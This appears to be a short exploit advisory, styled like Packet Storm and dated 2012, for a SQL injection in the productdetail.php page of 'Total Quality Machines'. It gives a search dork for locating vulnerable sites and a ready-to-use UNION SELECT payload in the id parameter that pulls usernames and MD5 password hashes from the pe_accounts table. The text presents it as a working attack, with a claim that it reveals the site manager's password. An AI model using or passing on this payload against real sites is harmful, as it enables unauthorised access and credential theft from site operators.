Total Quality Machines suffers from a remote SQL injection vulnerability.
855142e1f9f9015775a8561259514e29dcce8e22d1d6b30ff950561c1b4fc8a6##################################################################
# Title : Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities
#
# Discovered By: CrAzY CrAcKeR
#
# Home : Null
#
# Email : CrAzY_CrAcKeR@hotmail.com.com
#
# date : 14/4/2012
#
# d0rk:- "Total Quality Machines"
#
##################################################################
##################################################################
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] http://www.???.com/productdetail.php?id=(sql)
#
# [-] Injection code.... ( -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts )
#
# [-] http://www.???.com/productdetail.php?id=--1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend A7eb Alwrd
####################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed